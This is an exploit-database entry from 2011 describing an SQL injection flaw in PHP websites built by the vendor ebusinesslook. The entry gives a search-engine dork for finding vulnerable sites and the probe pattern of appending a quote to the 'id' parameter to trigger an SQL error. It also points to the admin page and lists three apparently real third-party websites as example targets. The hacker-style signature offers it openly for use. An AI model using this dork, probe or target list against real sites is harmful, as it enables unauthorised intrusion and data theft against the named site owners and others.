ebusinesslook SQL injection Vulnerability

2011-06-13T00:00:00
ID 1337DAY-ID-16319
Type zdt
Reporter k's0uR!
Modified 2011-06-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Exploit Title : ebusinesslook.. SQL injection Vulnerability
[+] Date : 10 June 2011
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Design and Developed by ebusinesslook"[Or]"Developed by eBusinesslook"
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Exploit:


››http://localhost/index.php?id={VaLid id }

››http://localhost/index.php?id=1' » {sql Error}  (^_^)
››http://localhost/index.php?id= SQL here 
...
›› admin page:
›› http://localhost/admin/  (*_*)


‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Example:

››http://www.constructioncommonsense.com/index.php?id=2'
››http://www.transuniontruck.com/index.php?id=6'
››http://groverservicecentre.com/index.php?id=4'

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]Greetz To : 4ll 1nj3ctor team... 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued..



#  0day.today [2018-03-14]  #